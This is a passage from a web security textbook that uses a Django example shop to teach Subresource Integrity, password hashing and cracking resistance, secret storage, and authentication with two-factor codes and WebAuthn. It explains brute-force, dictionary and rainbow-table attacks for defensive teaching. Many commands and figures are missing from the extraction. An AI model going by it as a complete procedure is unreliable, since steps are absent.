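The same digest can be produced in Python rather than with openssl. This sketch computes an integrity value from the raw bytes of a script; the function name and the stand-in bytes are assumptions, and in practice the bytes would come from the file itself or from the body fetched with Curl.

```python
import base64
import hashlib


def sri_value(data: bytes) -> str:
    """Return an integrity attribute value of the form sha256-<Base64 digest>."""
    digest = hashlib.sha256(data).digest()
    return "sha256-" + base64.b64encode(digest).decode("ascii")


# Stand-in bytes for illustration; read the real script file in binary mode.
script_bytes = b"function currentSlide(n) { /* ... */ }\n"
print(f'integrity="{sri_value(script_bytes)}"')
```

The file must be hashed byte for byte: any change to the script, even whitespace, yields a different value and causes the browser to reject it.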
8.6 Summary
Our sites often need to access external resources, such as images,
JavaScript code, REST APIs, and so forth. This brings risks because one
can unknowingly load resources from malicious sites. In this chapter, we
looked at three ways to protect us from cross-site exploitation.
Browsers prevent access to cross-site resources in asynchronous
JavaScript calls by default. Cross-Origin Resource Sharing (CORS) allows
us to relax this in a controlled way. Content Security Policy (CSP) allows us
to whitelist sources for individual resource types, such as images or scripts.
Subresource Integrity allows us to prevent browsers from loading a script if
its hash does not match a given value.
In the next chapter, we will look at how to safely manage passwords.
CHAPTER 9
Password
Management
In this chapter, we will look at the storage and management of passwords,
both for our users and for accessing services like databases.
Passwords are often the weakest link in web application security. This
is because they rely on humans to be secure. We have two types of attack to
consider:
1. Cracking a password
Chapter 9 Password Management
Brute-Force Attacks
In a brute-force attack, the attacker systematically tries every password
until one matches. This can be done directly on the login page of an
application using a script (Python, Bash with Curl, etc.). The attacker
first tries a, then b, up to z, digits, uppercase and punctuation, then aa,
ab, etc., until all possible combinations have been tried. The number of
combinations will depend on the password length and the number of
different characters likely to be present.
Brute-force attacks are much faster when passwords are simple
words that exist in the dictionary, as only words need to be tried instead
of all alphanumeric combinations. As a comparison, there are over two
hundred billion combinations of up to eight lowercase letters. The full
Oxford English Dictionary contains around 270,000 words, so trying only
English words, even including obsolete ones, saves time by six orders of
magnitude. Cracking passwords this way is called a dictionary attack. Lists
of known passwords that were previously cracked (we mentioned the
RockYou attack in Chapter 1) can also be used.
We will return to this in Section 9.2 when we talk about password
policies.
To prevent brute-force attacks on the login page, it is a good idea to
artificially delay the response after a rapid series of failures from the same
IP address. As an added security, you may wish to block the user’s account
after further successive failures.
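One way to picture the delay is the sketch below, which keeps failed attempts per IP address in memory and returns a wait time that doubles with each failure beyond a small allowance. The class name, thresholds, and doubling rule are all assumptions chosen for illustration; a real deployment would need shared storage and a policy suited to the application.

```python
import time
from collections import defaultdict


class LoginThrottle:
    """In-memory sketch: delay grows with recent failures from one IP address."""

    def __init__(self, window=60.0, free_attempts=3, max_delay=30.0):
        self.window = window                # seconds over which failures count
        self.free_attempts = free_attempts  # failures allowed before delaying
        self.max_delay = max_delay          # upper bound on the delay in seconds
        self.failures = defaultdict(list)   # ip -> timestamps of failed logins

    def record_failure(self, ip, now=None):
        """Remember a failed login attempt from this IP address."""
        self.failures[ip].append(time.time() if now is None else now)

    def delay_for(self, ip, now=None):
        """Seconds to wait before answering the next attempt from this IP."""
        now = time.time() if now is None else now
        recent = [t for t in self.failures[ip] if now - t <= self.window]
        self.failures[ip] = recent          # forget failures outside the window
        excess = len(recent) - self.free_attempts
        return 0.0 if excess <= 0 else min(self.max_delay, 2.0 ** excess)
```

A login view would call delay_for() before checking credentials and record_failure() when the check fails.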
If the attacker can get a copy of your usernames and password hashes,
brute forcing becomes simpler as the attacker can perform it offline
without accessing your login page. Not only is this more discreet, evading
detection, but it is also faster because no network is involved and the
attacker can use multiple CPU cores and GPUs.
Attackers use software such as John the Ripper¹ or THC Hydra.² These
tools take a dictionary as input and try various common modifications
of each word such as case change and appending digits. Hackers can
write custom modification rules based on their experience of common
passwords. Therefore, adding digits or making small changes to words
does not prevent dictionary attacks.
Salted Hashes
To prevent rainbow table attacks, a salt is often used. This is a random
string that is appended to the plaintext password before creating the hash.
As it is random, it has to be stored alongside the username and hashed
password. The process is illustrated in Figure 9-2. A random salt, unique
per user, is created when the user registers. This and the password are
hashed, and the result is stored, along with the salt. When the user logs
in, the salt is fetched from the database and used to rehash the entered
password. This is compared against the hashed password in the database.
1
www.openwall.com/john/
2
https://github.com/vanhauser-thc/thc-hydra
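The registration and login steps just described can be sketched in a few lines of Python. A single SHA-256 is used here only to keep the salting step visible; it is an assumption made for illustration, and a deliberately slow algorithm such as PBKDF2 is the better choice for real password storage. The function names are hypothetical.

```python
import hashlib
import hmac
import secrets


def register(password: str) -> tuple[str, str]:
    """Create a per-user random salt and return (salt, hash) for storage."""
    salt = secrets.token_hex(8)
    digest = hashlib.sha256((password + salt).encode("utf-8")).hexdigest()
    return salt, digest


def check_login(password: str, salt: str, stored_hash: str) -> bool:
    """Rehash the entered password with the stored salt and compare."""
    digest = hashlib.sha256((password + salt).encode("utf-8")).hexdigest()
    return hmac.compare_digest(digest, stored_hash)
```

Two users who choose the same password receive different salts and therefore different stored hashes.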
Salting does not make brute forcing harder, other than making the
algorithm a little slower because it is hashing a longer string. As the salt is
stored along with the hash, both are usually compromised together. The
purpose of salting is to make rainbow tables infeasible.
Rainbow tables rely on a password always mapping to the same hash.
Say a hacker wants to create a rainbow table. They enumerate all possible
one to eight character passwords and create the hash for each one. When
a site’s hashed password table is compromised, they look the hash up in
their table and find the plaintext password that corresponds to it.
If the compromised hash were created from a salt as well as the
plaintext password, the hash would not match anything in their table as
it was created before they knew the salt. To guarantee their table has a
match, they must create a hash of every password and salt combination. If
the salt is eight characters, they now need hashes of every combination of
1 + 8 = 9 characters for single-character passwords, 2 + 8 = 10 characters
for two-character passwords, and so on up to 8 + 8 = 16 characters for
eight-character passwords. There are now 4.5 × 10^22 hashes to compute,
and to store them uncompressed and unindexed needs 2.1 × 10^24 bytes.
is. The padding serves the purpose of flipping half the bits of K. The reason
for doing this is that HMAC is based on another secure PRF called NMAC,
which is a function of two keys:
The XORing function creates the two keys K_out and K_in from the one
key K. The security of NMAC was found not to be degraded by the two keys
being related.
If K is longer than B, it is first hashed using the same algorithm H.
The PBKDF2 password hashing algorithm is a function of a PRF, along
with the plaintext password P, a salt S, the number of iterations c, and the
key length dkLen. It produces a derived key DK of length dkLen octets:
PRF(·) = HMAC(K, ·).
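Python's standard library exposes PBKDF2 with an HMAC PRF as hashlib.pbkdf2_hmac. The sketch below maps the symbols used above (P, S, c, dkLen) onto its arguments; the password, iteration count, and key length are illustrative assumptions, not recommendations.

```python
import hashlib
import os

password = b"correct horse battery staple"  # P: example plaintext password
salt = os.urandom(16)                         # S: random per-user salt
iterations = 100_000                          # c: illustrative value only
dk_len = 32                                   # dkLen: derived key length in octets

# The PRF is HMAC with SHA-256 as the underlying hash function H.
derived_key = hashlib.pbkdf2_hmac("sha256", password, salt, iterations, dklen=dk_len)
print(derived_key.hex())
```

The salt and iteration count must be stored with the derived key so that the same computation can be repeated at login.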
3
https://cheatsheetseries.owasp.org/cheatsheets/PasswordStorageCheatSheet.html
We saw earlier that there are around two hundred billion passwords
of one to eight lowercase letters. The actual number is 2.2 × 10^11. If we
add uppercase letters and 12 special characters (for a total of 64 different
characters), that number increases to about 2.9 × 10^14 combinations. This
means passwords are over 1,000 times harder to brute force. If we add
nine-character passwords, the number increases to 1.8 × 10^16. This is over
80,000 times harder to brute force than passwords with one to eight lowercase
letters. Passwords of eight characters used to be considered sufficient,
and in fact old hashing algorithms such as Unix crypt could only hash
passwords of no more than eight characters. With modern cracking speeds,
nine characters is more often considered a good minimum. The longer the
password is, the stronger it is.
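These counts are sums of a geometric series and are easy to reproduce. The short sketch below computes the number of passwords of length one up to a maximum for a given alphabet size; the function and variable names are assumptions for illustration.

```python
def count_passwords(alphabet_size: int, max_length: int) -> int:
    """Number of passwords of length 1..max_length over the given alphabet."""
    return sum(alphabet_size ** n for n in range(1, max_length + 1))


lower_8 = count_passwords(26, 8)   # lowercase letters only, up to 8 characters
mixed_8 = count_passwords(64, 8)   # 64-character alphabet, up to 8 characters
mixed_9 = count_passwords(64, 9)   # 64-character alphabet, up to 9 characters

print(f"{lower_8:.1e}  {mixed_8:.1e}  {mixed_9:.1e}")
print(f"ratios: {mixed_8 / lower_8:.0f}x and {mixed_9 / lower_8:.0f}x")
```

Adding one character of length multiplies the search space by the alphabet size, which is why length matters more than any single composition rule.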
Checks for password quality can be performed when the password is
created. Some common rules are as follows:
We saw in Section 6.1 that GET requests should not change state in
order to avoid CSRF attacks. The preceding GET request does not actually
change state: it takes a user to a page that prompts them for a new
password. The new password is sent in a POST request.
By including the last login timestamp and email address in the hashed
token, Django can invalidate it if the user has successfully logged in since
requesting it, or has changed their password. By default, the token expires
after 72 hours.
Note that Django does not (and cannot) decrypt the token. It rehashes
the user’s details and the timestamp in the first part of the token and
confirms the two hashes match.
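The idea of a token that is verified by rehashing, not decrypting, can be sketched with the standard hmac module. This is a simplified illustration and not Django's actual implementation: the field order, separator, secret, and function names are all assumptions.

```python
import hashlib
import hmac

SECRET = b"hypothetical-server-secret"  # stands in for the site's secret key


def _sign(user_id, email, password_hash, last_login, timestamp):
    """HMAC over the user state that should invalidate the token when it changes."""
    message = f"{user_id}|{email}|{password_hash}|{last_login}|{timestamp}"
    return hmac.new(SECRET, message.encode("utf-8"), hashlib.sha256).hexdigest()


def make_token(user_id, email, password_hash, last_login, now):
    """Token = creation timestamp, a hyphen, then the HMAC of the user state."""
    ts = int(now)
    return f"{ts}-{_sign(user_id, email, password_hash, last_login, ts)}"


def check_token(token, user_id, email, password_hash, last_login, now,
                max_age=72 * 3600):
    """Recompute the hash from the current user state and compare."""
    ts_text, _, signature = token.partition("-")
    if not ts_text.isdigit() or now - int(ts_text) > max_age:
        return False  # malformed or expired
    expected = _sign(user_id, email, password_hash, last_login, int(ts_text))
    return hmac.compare_digest(signature, expected)
```

If the user logs in or changes their password after the token was issued, the recomputed hash no longer matches and the token is rejected.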
export DBPASSWORD=mydatabasepwd
export SECRET_KEY=djangosecretkey
import os
...
SECRET_KEY = os.environ['SECRET_KEY']
. /secrets/config.env
The environment file should not go into Git so we can put an exclusion
in the .gitignore file. Simply config.env on a line by itself should suffice,
or prefixed with its subdirectory relative to the Git folder.
So that your developers know what format this file should be, create
another called config.env_template. Set the same variables in it, but
to dummy values. When a developer clones the repository, they should
copy config.env_template to config.env and change the values for each
variable. The same should be done in production (obviously with different
values). The config.env_template file can go into Git as it contains no real
passwords.
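A small helper can make a missing variable fail early with a useful message instead of a bare KeyError. This is a sketch; the helper name require_env is an assumption, while the file names in the message follow the convention described above.

```python
import os


def require_env(name: str) -> str:
    """Return the variable's value, failing early with a clear message."""
    try:
        return os.environ[name]
    except KeyError:
        raise RuntimeError(
            f"{name} is not set; copy config.env_template to config.env and source it"
        ) from None


# In settings.py one might then write, for example:
# SECRET_KEY = require_env("SECRET_KEY")
```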
4
See www.vaultproject.io
9.5 Summary
Passwords are used to make applications secure, but they are only as
safe as the method in which they are stored. We looked at how hackers
crack passwords and at cryptographic techniques for mitigating this risk.
Passwords are also made less secure if users are free to choose easily
guessed ones, so we examined some rules for enforcing good passwords,
as well as how to provide users a secure means to reset their passwords
when they forget them.
Sometimes, passwords or keys need to be stored in an application, for
example, database passwords. We looked at a simple method to ensure
they don’t accidentally get stored in a source code repository.
Storing passwords securely is a necessary part of application design,
but by itself does not guarantee secure authentication. Accounts need
to be created, passwords need to be validated, and in some instances,
applications from different organizations have to trust each other. In the
next chapter, we will begin looking at how to build a secure authentication
mechanism.
CHAPTER 10
Authentication
and Authorization
In this chapter, we will look at options for authenticating users and
determining what permissions they have been given. The most common
authentication method is prompting for a username and password, so
we will begin with that. Other authentication methods include one-
time passwords and biometric data. We will look at how to implement
those also.
Once a user has authenticated, the application must determine what
permissions that user has. This is authorization, and we will look at various
methods for implementing it, including role-based authorization, JSON
web tokens, and API keys.
OAuth2 is a standardized protocol for authentication and
authorization. As it is a big topic, we will cover it in a separate chapter.
• One-time password
• Role-based authorization
• API keys
• OAuth2
Chapter 10 Authentication and Authorization
HTTP Authentication
The HTTP specification, in RFC 2617 [12] and RFC 7616 [1], defines HTTP
headers for authentication. These are supported by servers such as Apache
and Nginx as well as common browsers. The header
WWW-Authenticate
is sent by the server to tell the client that the user must authenticate. The
client prompts for a username and password and sends them back in a
new request with the header
Authorization
Basic Authentication
HTTP Basic Authentication is illustrated in Figure 10-1. The user requests a
page / that is protected by Basic authentication. The server responds with
401 Unauthorized and includes the header
instructing the client that it needs to provide credentials to access the page.
The realm is a name of the developer’s choosing. Credentials the user
provides will be valid for pages with the same realm.
Base64(username:password)
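The Base64(username:password) credential can be built and reversed in a few lines of Python. The sketch below constructs the value of the Authorization header and then decodes it again, which shows that Base64 is an encoding and offers no confidentiality. The function names are assumptions for illustration.

```python
import base64


def basic_auth_header(username: str, password: str) -> str:
    """Build the value of the Authorization header for HTTP Basic authentication."""
    credentials = f"{username}:{password}".encode("utf-8")
    return "Basic " + base64.b64encode(credentials).decode("ascii")


def decode_basic_auth(header_value: str) -> tuple[str, str]:
    """Recover (username, password) from the header value."""
    scheme, _, encoded = header_value.partition(" ")
    if scheme != "Basic":
        raise ValueError("not a Basic Authorization header")
    # Only the first colon separates the two; the password may contain colons.
    username, _, password = base64.b64decode(encoded).decode("utf-8").partition(":")
    return username, password


print(basic_auth_header("bob", "mypassword"))
```

Anyone who can observe the header can recover the password, so Basic authentication should only be used over HTTPS.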
<VirtualHost *:80>
ServerName example.com
DocumentRoot /var/www/html
<Directory "/var/www/html/protected">
AuthType Basic
AuthName "ProtectedArea"
AuthUserFile /etc/apache2/.htpasswd
Require valid-user
</Directory>
</VirtualHost>
Digest Authentication
HTTP defines a second type of authentication, called Digest, to mitigate
disclosure of the password through a man-in-the-middle attack. It
achieves this by ensuring the password is not sent as plaintext.
The specification supports a number of options, making the syntax quite
elaborate. We will only look at one example, adapted from one given in RFC
7616. For more details, see RFC 7616 or Mozilla’s MDN Web Docs entry.¹
1
https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/WWW-Authenticate
Form-Based Authentication
Form-based authentication is performed by the application, not the web
server. When a user visits a page that requires authentication, and no
credentials have been provided, the application redirects the user to a
login page. The process is illustrated in Figure 10-2.
The next time the user requests a page, the session ID is sent to the
server in the Cookie header. The server validates it against its session table.
If it is valid, the user is taken directly to their requested page. If not, the
user is prompted to log in again.
path('accounts/', include('django.contrib.auth.urls')),
coffeeshopsite/coffeeshop/templates/registration/login.html
@login_required
def basket(request):
cart = None
...
If the user visits the URL corresponding to this view (/basket/) and is
not already logged in (i.e., the request does not contain a valid session ID
as a cookie), the decorator redirects the user to the login page defined in
settings.py by LOGIN_URL, with /basket/ as the value of the next parameter.
We can also check if the user is authenticated inside a view with the
following code:
if request.user.is_authenticated:
...
10.3 One-Time Passwords
One-time passwords, or OTPs, become invalid after a single use. After an
OTP has been used to log into a server, the server no longer
accepts it as a valid password.
OTPs are often used together with another form of authentication,
such as username/password, as a two-factor authentication process,
though some applications use them as a sole factor.
There are two popular algorithms for generating OTPs: HMAC-Based
One-Time Passwords (HOTPs) and Time-Based One-Time Passwords
(TOTPs). There are also two ways of delivering them to the user. Either
they are generated by the server and sent to a device registered to that
user, for example, by SMS to a mobile phone, or the user has a device that
can independently generate an OTP that matches the next one the server
expects. In the latter scenario, the OTP is never delivered over a network.
When talking about OTPs, we talk about a token service and a validation
service. The token service issues the OTP, and the validation service
validates it. If an application sends an OTP via SMS, and the user logs into
the same application with it, then the token and validation services
are the same. However, a token service may be an application running on a
user’s smartphone, or a dedicated piece of hardware. In this situation, the
token and validation services are different.
That is, the HOTP hash is a function of the symmetric key and the
current counter value. Trunc_d(h) is a function that truncates the hash to d
digits. Six digits is common for HOTPs. For SHA-1, d must be less than or
equal to ten.
By using HMAC, the OTP is cryptographically secure—an attacker
cannot reproduce it without the secret key.
Each time an HOTP is generated, the token service increments its
counter by one. Each time the validation service consumes it, it also
increments its counter.
It can happen that the validation service’s counter lags behind the
token service’s. This happens if tokens are generated but not used.
Therefore, a synchronization process can be added, allowing the validation
service to look ahead for a small number of counter values. If this fails
to achieve a matching HOTP, the two services must be resynchronized
manually.
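The counter-based scheme and the look-ahead window can be sketched in Python following RFC 4226. The hotp() function implements the HMAC-SHA-1 and truncation steps; the validate() helper, its name, and its window size of three are assumptions for illustration.

```python
import hashlib
import hmac
import struct


def hotp(key: bytes, counter: int, digits: int = 6) -> str:
    """HOTP per RFC 4226: HMAC-SHA-1 of the counter, dynamically truncated."""
    mac = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F  # low four bits of the last byte pick the offset
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def validate(key: bytes, server_counter: int, otp: str, look_ahead: int = 3):
    """Return the new server counter if otp matches within the window, else None."""
    for c in range(server_counter, server_counter + look_ahead + 1):
        if hmac.compare_digest(hotp(key, c), otp):
            return c + 1  # consume the matching counter value
    return None


key = b"12345678901234567890"  # test key from RFC 4226, Appendix D
print(hotp(key, 0))
```

On a successful match, the validation service stores the returned counter, which also skips any tokens that were generated but never used.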
Google Authenticator
Google Authenticator is a token service application, available for Android
and iPhone, that implements the HOTP and TOTP protocols. It is released
under the Apache License 2.0 and available as open source on GitHub.⁵ Its
original purpose was to enable users to log into their Google accounts using
2
www.cnbc.com/2019/09/06/hack-of-jack-dorseys-twitter-account-highlights-sim-swapping-threat.html
3
See https://berlin.ccc.de/~tobias/31c3-ss7-locate-track-manipulate.pdf or https://youtu.be/-wu_pO5Z7Pk
4
See https://uk.pcmag.com/security/89214/phone-hack-drains-german-bank-accounts
5
https://github.com/google/google-authenticator
otpauth://type/label?parameters
The type is either hotp or totp. The label identifies the account for which
the secret key applies. As a user may use the same username for more than
one service, a convention is to prefix the username with the service name
and a colon, for example, Coffeeshop:bob or Google:[email protected].
The parameters include
• secret for the secret key (which should be
Base32-encoded)
• issuer for the name of the issuer (e.g., Coffeeshop)
6
See https://github.com/google/google-authenticator/wiki/Key-Uri-Format
An example URI is
otpauth://totp/Coffeeshop:bob?secret=JHFKDHF6RT3F2QM3&issuer=Coffeeshop
Google Authenticator, and other token services using the same URI
format, can scan a QR code containing such a URI, saving the user from
having to type the data manually while also avoiding sending it over the
network.
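A URI in this format can be assembled with the standard library. The sketch below generates a Base32-encoded secret and builds the URI from an issuer and username; the function names are assumptions, and a real application would pass the resulting string to a QR code generator.

```python
import base64
import secrets
from urllib.parse import quote, urlencode


def new_secret(num_bytes: int = 10) -> str:
    """Random key, Base32-encoded as the secret parameter expects."""
    return base64.b32encode(secrets.token_bytes(num_bytes)).decode("ascii")


def otpauth_uri(issuer: str, username: str, secret: str, otp_type: str = "totp") -> str:
    """Build otpauth://type/label?parameters with the label issuer:username."""
    label = f"{quote(issuer)}:{quote(username)}"
    params = urlencode({"secret": secret, "issuer": issuer})
    return f"otpauth://{otp_type}/{label}?{params}"


print(otpauth_uri("Coffeeshop", "bob", "JHFKDHF6RT3F2QM3"))
```

The secret is the only sensitive part of the URI, so the QR code should be shown once, over HTTPS, to the authenticated user.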
or
but we have already done this (with the phonenumberslite option) in the
Coffeeshop VM. For more details on installing django-two-factor-auth,
see its ReadTheDocs page.⁷
Next, we must add the two_factor app, and its underlying OTP applications,
to our site. Edit the settings.py file and add the apps to INSTALLED_APPS:
INSTALLED_APPS = [
...
'coffeeshop',
'sslserver',
# 2FA
'django_otp',
'django_otp.plugins.otp_static',
'django_otp.plugins.otp_totp',
'two_factor',
]
We must also add its middleware. Also in settings.py, edit the MIDDLEWARE
variable, adding the OTP middleware below AuthenticationMiddleware:
MIDDLEWARE = [
...
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django_otp.middleware.OTPMiddleware', # 2FA
...
]
7
https://django-two-factor-auth.readthedocs.io/en/1.13.1/
We need a different login page for 2FA—the login process has to prompt the
user for the OTP as well as the username and password. The two_factor
app comes with a login page out of the box. Still in settings.py, change the
LOGIN_URL to point to it:
#LOGIN_URL = '/account/login/'
# 2FA
LOGIN_URL = 'two_factor:login'
...
from two_factor.urls import urlpatterns as tf_urls
urlpatterns = [
path('', include(tf_urls)),
path('admin/', admin.site.urls),
path('', include('coffeeshop.urls')),
path('account/', include('django.contrib.auth.urls')),
]
By default, 2FA is disabled for all users. A user must enable it manually.
The two_factor app has views to do this, but we have to add a link to
them in the My Account page. Edit the template myaccount.html in
coffeeshopsite/coffeeshop/templates/coffeeshop and make the
following change (we are just adding one line):
...
</p>
<p><a href="{% url 'two_factor:profile' %}">Two-Factor
Authentication</a></p>
<p><a href="{% url 'changeemail' %}">Change email
address</a></p>
...
The two_factor and OTP apps add additional tables to the database. To
create them, perform a database migration with
If you find you have introduced bugs while editing the source code, you may
prefer to run a development instance so you can inspect the errors more
easily. To do this, run the command
Let’s add 2FA to Bob’s account. First, log in as user bob. You will notice
the login page has changed, and that it has a warning bar at the top about
creating a _base.html template. In a production application, you would
create your own version of this template that matches your look and feel. If the
warning bothers you, there is an identical _base.html in
snippets/2fa/coffeeshop/templates/two_factor
coffeeshopsite/coffeeshop/templates/two_factor/_base.html
If you like, you can edit it further to match our look and feel (we have not).
Once you have logged in as Bob, click on the My Account link in the navigation
bar and then Two-Factor Authentication. This takes you to the wizard provided
by two_factor. If the logged-in user has not enabled 2FA, there is a button
to enable it. Click on this button. If you visit this page after enabling 2FA, it
displays a button to disable it.
Click through the next wizard screen and you will see a page with the QR code
to scan into Google Authenticator. It should look similar to Figure 10-3. Now
open Google Authenticator on your smartphone. If you haven’t used it before, it
will look like Figure 10-4. Click Scan a QR code and point it at the QR code in
the browser. If you have already used Google Authenticator, click on the round
plus button at the bottom instead (see Figure 10-5). Coffeeshop should register
to Google Authenticator, and you will see a TOTP that updates every 30
seconds, as in Figure 10-5. Enter this code into the Token form field and click
Next. The two_factor app will also generate a TOTP, and so long as your VM
and smartphone clocks mostly match, 2FA will be enabled.
If you have problems, try updating your VM’s clock to match the one on your
smartphone. Note that you have to set it as UTC. To see the current time, enter
date
date MMDDhhmm.ss
date 01020922.30
will set the time to 9:22:30 AM on 2 January (without changing the year).
The command
date 01021509
Now, log out and log in again. Coffeeshop will prompt you for a new TOTP. Get
this from Google Authenticator.
Disabling 2FA
To disable 2FA, follow the Two-Factor Authentication link again and click the
disable button. You can delete it from Google Authenticator by clicking the
three horizontal dots at the top of the app, then on the pencil icon, then on the
trash icon.
There is no need to clean up after this exercise. 2FA, whether enabled for a
user or not, will not interfere with any other exercise.
As TOTPs are standardized, any application that generates them can be used
in place of Google Authenticator, so long as it can also scan a URI in the same
format. Alternatively, it is not hard to create one of your own by using the
formula in the RFC. This allows you as a developer to create a branded app
that matches your look and feel.
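As a minimal sketch of how little code the RFC formula needs, the following Python implements TOTP (RFC 6238) on top of HOTP (RFC 4226) using only the standard library. The 30-second step and six digits are the common defaults; the function names are assumptions for illustration.

```python
import hashlib
import hmac
import struct
import time


def hotp(key: bytes, counter: int, digits: int = 6) -> str:
    """HOTP per RFC 4226: HMAC-SHA-1 of the counter, dynamically truncated."""
    mac = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp(key: bytes, now=None, step: int = 30, digits: int = 6) -> str:
    """TOTP per RFC 6238: HOTP with the counter set to the current time step."""
    now = time.time() if now is None else now
    return hotp(key, int(now) // step, digits)


key = b"12345678901234567890"  # SHA-1 test key from RFC 6238, Appendix B
print(totp(key))
```

Because the counter is derived from UTC time, the token and validation services agree only while their clocks are within about one time step of each other.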
10.4 Authentication
with Public-Key Cryptography
We saw in Chapter 5 that the SSH protocol uses a public-private key pair
for authentication. TLS/SSL uses the same technique to authenticate
servers. The Web Authentication API, or WebAuthn, is a set of classes
implemented in JavaScript that can be used to add authentication to web
applications using a similar technique. It is a JavaScript API so that it
can use resources on the user’s device.
WebAuthn defines three roles:
Registration
The registration process makes use of a private key embedded in the
Authenticator that has a certificate that is digitally signed by a trusted
authority. The algorithm uses the concept of a signed challenge:
The Client application sends the attestation to the server in Step 6, for
example, via a REST API call, containing the new public key. Finally, the server
validates this object to confirm its origin and saves the public key (Step 7).
Authentication
The authentication process is shown in Figure 10-7. As in the registration
process, after the Client requests that authentication begin in Step
1, the Server sends a challenge so that it can verify the identity of the
Authenticator when it responds (Step 2). The Client sends the server ID,
challenge, and origin of the request to the Authenticator in Step 3.
Next, the Authenticator asks the user if they are happy for the
credentials to be provided. If so, it fetches the corresponding private
key and verifies the identity of the user (again using a PIN, password, or
biometric data). This is shown as Step 4. It creates an assertion including
the challenge, server ID, and origin and signs it with the private key for
the account. It returns this to the Client in Step 5, which sends it on to the
Server in Step 6.
The server validates the assertion using the public key stored for the
account in Step 7. If it validates, it can sign the user in.
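Part of the Server's validation in Step 7 can be sketched in a few lines. The example below only checks the client data that accompanies an assertion: WebAuthn delivers it as a JSON document containing type, challenge (Base64Url-encoded), and origin fields. The function names are hypothetical, and the sketch deliberately omits verifying the signature against the stored public key, which a real application would leave to a WebAuthn library.

```python
import base64
import hmac
import json
import secrets


def new_challenge() -> bytes:
    """Create the random challenge the Server sends in Step 2."""
    return secrets.token_bytes(32)


def b64url(data: bytes) -> str:
    """Base64Url-encode without padding, as used for the challenge."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def check_client_data(client_data_json: bytes, expected_challenge: bytes,
                      expected_origin: str,
                      expected_type: str = "webauthn.get") -> bool:
    """Check type, challenge, and origin. Signature checking is NOT done here."""
    try:
        data = json.loads(client_data_json)
    except ValueError:
        return False
    if not isinstance(data, dict) or not isinstance(data.get("challenge"), str):
        return False
    # Compare the challenge in constant time.
    challenge_ok = hmac.compare_digest(
        data["challenge"].encode("utf-8"),
        b64url(expected_challenge).encode("utf-8"),
    )
    return (challenge_ok
            and data.get("type") == expected_type
            and data.get("origin") == expected_origin)
```

Checking the origin is what ties the assertion to the site the user actually visited, and checking the challenge ensures an old assertion cannot be replayed.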
More information on WebAuthn is available in the W3C
Recommendation [13]. There is also a good Mozilla MDN Web Docs
article8 and a practical guide by Vasyl Boroviak at itnext.io.9
The WebAuthn protocol is complex; however, much of it is handled
by the WebAuthn implementation itself, leaving relatively little for the
application developer to implement. We will look at an example using
biometric authentication in the next section.
8
https://developer.mozilla.org/en-US/docs/Web/API/Web_Authentication_API
9
https://itnext.io/biometrics-fingerprint-auth-in-your-web-apps-d5599522d0b3
10.5 Biometric Authentication
Biometric authentication works by capturing features of a person’s body
that other individuals do not have. For consumer applications, the commonly
used biometric measures are fingerprints and facial features. The most
common use is for reauthentication after a user has already signed in by
other means (such as a username and password), but biometrics can also be
used for 2FA.
Biometric authentication is now widely used in smartphones, which
have dedicated scanners for this purpose. Developing biometric scanners
is not trivial because they must differentiate between a real person
and a facsimile of that person, such as a photo or mask. It would be
unacceptable, for example, if a website or mobile phone application could
be logged into simply by holding a photo of a user to the camera.
Developers of biometric scanners use the term liveness to describe
properties that differentiate a real person from a photo or mask.
For example, some fingerprint scanners use capacitive sensing that
detects electrical conductivity rather than capturing an optical image.
The ridges and valleys of a fingerprint differ in height, which results in
differences in conductivity.
10
See www.wired.com/story/hackers-say-broke-face-id-security/
In Section 2.5, when we set up our VM, we forwarded port 8100 from
the VM to port 8100 on the host (or another port if that was already in
use). This means you can run the application in your Vagrant VM and
configure the DNS record to point to the host computer’s IP address, rather
than 10.50.0.2, the address of the Vagrant VM. We will be running the
application on port 8100, though that is easily changed if you want to run
on a different port.
Setting up a DNS server differs depending on your network and is
therefore beyond the scope of this book. Do not worry if you cannot meet
these requirements, though. The exercise is not mandatory, and you can still
benefit from simply reading the exercise and the downloaded source code.
BIOMETRIC 2FA
As discussed previously, the prerequisites for this exercise differ from the
others. You will need a computer (with or without the Coffeeshop VM) to run
the Server on and a device with fingerprint or face authentication to act as the
Client. If these are not the same device, the Client must be able to address the
Server by hostname. See the preceding text for more information.
We will begin by setting up the Server. For this exercise, it is not integrated
with the Coffeeshop application. The package we will use is not perfectly
modular, and there is boilerplate code to write, which detracts from
learning. Fortunately, it comes with an example application, which is almost
ready to use.
At the time of writing, the latest version was 2.4.0. If, when doing this exercise,
you find the code differs greatly from what is written here, switch to version
2.4.0 with
For this exercise, it is best to start with a fresh Python installation. We will use
venv to create a virtual environment.
Once you have cloned the repository and created and activated your virtual
environment, edit the django-mfa2/example/examp file. Find the line
where the FIDO_SERVER_ID variable is set. Change the line to set the
variable to the hostname you will use to address the application on your
Client device. If your Client and Server are the same device, you can set it to
localhost. If they are different devices, you should set it to the hostname the
Client will address the Server with. For example, I am running the application
on my Mac that has a hostname mac1. I have created a record on my home
DNS server to give it the fully qualified domain name mac1.home. I would
therefore change the line to
FIDO_SERVER_ID=u"mac1.home"
There is no need to enter a port number here, even if you are not going to use
the default one.
cd django-mfa2
pip3 install wheel
pip3 install -r requirements.txt
Next, run Django migrate. This creates a single table, User_keys, to store
the public keys returned by the Authenticator (as well as other keys, e.g., the
symmetric key for implementing TOTP):
cd django-mfa2/example
python3 manage.py migrate
cd django-mfa2/example
python3 manage.py createsuperuser
It doesn’t matter what username, email address, and password you choose, so
long as you remember the username and password for the next step. For this
example, we created a user called admin.
We are now ready to run the Django application. WebAuthn only works over
HTTPS. We could create and install a self-signed key, as we did in Section
5.5, and then add the application to Apache. However, since this is just for
experimentation, there is an easier way. The package django-sslserver
that we installed earlier adds TLS/SSL support, with a built-in self-signed key,
to Django’s development server. To start it, run the command
The HTTPS server is now running on port 8100. If you prefer, you can use a
different port.
The next step is to open the application on the web browser of your Client
device. The URL you enter depends on where you are running the Server.
https://localhost:8100
Don’t forget to prefix it with https or the browser will default to http
and fail to load the page.
then the port will be the number assigned to host. In this example,
